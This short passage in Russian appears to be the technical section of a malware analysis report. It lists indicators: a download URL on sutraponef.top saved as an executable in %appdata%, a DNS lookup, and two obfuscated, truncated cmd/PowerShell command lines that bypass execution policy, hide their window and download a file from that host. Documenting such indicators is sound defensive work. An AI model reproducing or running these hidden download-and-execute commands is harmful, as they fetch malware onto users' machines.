Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^WE^r^shelL.E^XE ^-EXecUt^iO^NpolIc^Y BYpass -N^O^p^R^Of^ILE -W^IN^dOwstyl^e hIDDeN^ ^(n^EW-^o^B^j^eCt^ ^SY^s^TEM^.neT.wEbCliEnT^).dO^wn^lO^adF^ILE(^'http://sutraponef.top/r...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "po^WE^r^shelL.E^XE ^-EXecUt^iO^NpolIc^Y BYpass -N^O^p^R^Of^ILE -W^IN^dOwstyl^e hIDDeN^ ^(n^EW-^o^B^j^eCt^ ^SY^s^TEM^.neT.wEbCliEnT^).dO^wn^lO^adF^ILE(^'http://sutraponef.top/r...' (со скрытым окном)